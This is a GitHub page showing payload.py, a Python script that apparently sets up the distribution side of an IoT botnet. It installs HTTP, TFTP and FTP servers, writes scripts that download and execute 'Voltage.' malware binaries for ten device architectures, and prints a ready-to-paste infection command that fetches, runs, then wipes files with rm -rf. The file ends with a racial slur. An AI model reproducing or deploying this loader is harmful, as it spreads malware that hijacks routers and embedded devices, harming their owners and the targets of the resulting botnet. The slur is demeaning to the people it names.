-
Notifications
You must be signed in to change notification settings - Fork 0
/
payload.py
75 lines (75 loc) · 3.93 KB
/
payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import subprocess, sys, urllib
ip = urllib.urlopen('http://api.ipify.org').read()
exec_bin = "SSH"
bin_prefix = "Voltage."
bin_directory = "bins"
archs = ["x86", #1
"mips", #2
"mpsl", #3
"arm4", #4
"arm5", #5
"arm6", #6
"arm7", #7
"ppc", #8
"m68k", #9
"sh4"] #10
def run(cmd):
subprocess.call(cmd, shell=True)
print("Setting up HTTP TFTP and FTP for your payload")
print(" ")
run("yum install httpd -y &> /dev/null")
run("service httpd start &> /dev/null")
run("yum install xinetd tftp tftp-server -y &> /dev/null")
run("yum install vsftpd -y &> /dev/null")
run("service vsftpd start &> /dev/null")
run('''echo "service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s -c /var/lib/tftpboot
disable = no
per_source = 11
cps = 100 2
flags = IPv4
}
" > /etc/xinetd.d/tftp''')
run("service xinetd start &> /dev/null")
run('''echo "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart &> /dev/null")
run("service xinetd restart &> /dev/null")
print("Creating .sh Bins")
print(" ")
run('echo "#!/bin/bash" > /var/lib/tftpboot/lessie.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie.sh')
run('echo "#!/bin/bash" > /var/lib/tftpboot/lessie2.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie2.sh')
run('echo "#!/bin/bash" > /var/www/html/lessie.sh')
run('echo "ulimit -n 1024" >> /var/lib/tftpboot/lessie2.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/lessie2.sh')
run('echo "#!/bin/bash" > /var/ftp/lessie1.sh')
run('echo "ulimit -n 1024" >> /var/ftp/lessie1.sh')
run('echo "cp /bin/busybox /tmp/" >> /var/ftp/lessie1.sh')
for i in archs:
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+'; curl -O http://' + ip + '/'+bin_directory+'/'+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/www/html/lessie.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' '+bin_prefix+i+' '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/ftp/lessie1.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get '+bin_prefix+i+';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/lib/tftpboot/lessie.sh')
run('echo "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+bin_prefix+i+' -g ' + ip + ';cat '+bin_prefix+i+' >'+exec_bin+';chmod +x *;./'+exec_bin+'" >> /var/lib/tftpboot/lessie2.sh')
run("service xinetd restart &> /dev/null")
run("service httpd restart &> /dev/null")
run('echo -e "ulimit -n 99999" >> ~/.bashrc')
print("\x1b[0;32mPayload: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/lessie.sh; curl -O http://" + ip + "/lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp " + ip + " -c get lessie.sh; chmod 777 lessie.sh; sh lessie.sh; tftp -r lessie2.sh -g " + ip + "; chmod 777 lessie2.sh; sh lessie2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " lessie1.sh lessie1.sh; sh lessie1.sh; rm -rf lessie.sh lessie.sh lessie2.sh lessie1.sh; rm -rf *\x1b[0m")
print("")
raw_input("Cya nigga")